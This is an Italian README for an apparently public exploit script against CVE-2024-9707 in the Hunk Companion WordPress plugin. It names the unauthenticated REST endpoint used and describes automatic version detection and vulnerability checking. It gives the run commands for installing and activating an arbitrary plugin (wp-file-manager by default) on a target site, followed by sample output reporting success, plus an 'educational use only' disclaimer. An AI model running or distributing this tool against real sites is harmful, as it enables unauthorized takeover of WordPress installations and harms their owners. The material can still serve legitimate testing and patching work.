
Il plugin Hunk Companion per WordPress: vulnerabile all'installazione/attivazione non autorizzata di plugin (versioni fino alla 1.8.4 inclusa)
Questo script sfrutta la vulnerabilità nel plugin Hunk Companion per WordPress (CVE-2024-9707), consentendo a utenti non autorizzati di installare e attivare plugin arbitrari tramite l'endpoint API REST /wp-json/hc/v1/themehunk-import.
| Caratteristica | Descrizione |
|---|---|
| Rilevamento versione plugin | Controlla automaticamente la versione del plugin. |
| Verifica vulnerabilità | Determina se la versione rilevata è vulnerabile (<= 1.8.4). |
| Installazione plugin | Sfrutta la vulnerabilità per installare e attivare un plugin specificato. |
requests, argparse.pip install requests
options:
-h, --help mostra questo messaggio di aiuto ed esce
-u URL, --url URL URL di base del sito WordPress.
-p PLUGIN, --plugin PLUGIN
Nome del plugin (default: wp-file-manager).
2- Esegui lo script
python CVE-2024-9707.py -u <URL_TARGET> [-p <NOME_PLUGIN>]
python CVE-2024-9707.py -u https://example.com -p wp-file-manager
Detected version: 1.8.4
The site is vulnerable. Proceeding with exploitation.
Plugin installed and activated successfully.
Response Status: 200
Response Body: "http:\/\/192.168.100.74\/wordpress"
Questo script è solo a scopo educativo. Utilizzalo in modo responsabile e solamente su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test. Gli autori non sono responsabili per eventuali usi impropri o danni causati da questo strumento. by: Khaled_alenazi | Nxploited